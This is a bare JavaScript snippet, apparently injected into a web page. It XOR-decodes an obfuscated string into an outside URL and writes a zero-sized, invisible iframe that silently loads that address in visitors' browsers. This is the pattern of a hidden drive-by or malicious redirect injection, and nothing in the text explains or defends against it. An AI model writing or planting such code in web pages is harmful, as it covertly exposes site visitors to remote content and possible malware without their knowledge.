function MyDecode(str){var i,k,str2="";k=str.split(".");for(i=0;i<k.length;i++){str2+=String.fromCharCode(k[i]^0x12);}return str2;};document.write('<iframe src="'+ MyDecode("122.102.102.98.40.61.61.101.101.101.60.124.119.102.101.123.124.116.125.96.127.60.113.125.127.61.117.125.60.122.102.127.126") +'" width="0" height="0"/>');